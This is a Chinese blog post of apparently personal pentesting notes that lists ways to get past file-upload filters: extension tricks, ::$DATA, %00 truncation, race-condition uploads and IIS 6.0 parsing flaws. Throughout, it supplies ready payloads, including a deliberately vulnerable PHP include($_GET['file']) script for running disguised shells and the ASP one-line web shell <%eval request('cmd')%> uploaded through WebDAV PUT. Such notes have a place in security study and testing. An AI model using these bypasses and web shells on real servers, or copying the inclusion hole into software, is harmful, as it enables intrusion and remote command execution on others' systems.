文件上传

绕过方法

去除前端js认证

修改mime-type类型

添加空格绕过  php                    

修改文件后缀名 php2、php3、phtml

大小写混淆绕过 PhP

点号绕过    php.

特殊符号绕过  php::$DATA

路径绕过    php. .

双写绕过    pphphp

%00绕过    php%00(php5.3以下版本且关闭GPC)

 

文件包含先上传包含文件file.php

<?php
   if($_GET){
            include($_GET["file"]);
    }
    else{
            echo "not het args file";
    }
?>

再上传shell文件用文件包含访问含GIF98A的.jpg文件

file.php?file=1.jpg

 

竞争

编写脚本一直访问网页

import requests

while True:
       requests.get("url")

启动脚本,然后上传文件

 

 

IIS6.0漏洞

解析

*.asa  *.asp目录里的文件都会被解析

*.asp;test.jpg

<%=NOW()%>

 

PUT漏洞
PUT启动
开启webDAV,给予写入权限

<%eval request("cmd")%>

OPTIONS查看请求类型

PUT上传文件

COPY修改文件

 

文件后缀
.asa
.cer
.cdx

后缀文件会被解析为asp文件

posted @ 2020-07-16 12:58  f1veseven  阅读(120)  评论(0编辑  收藏  举报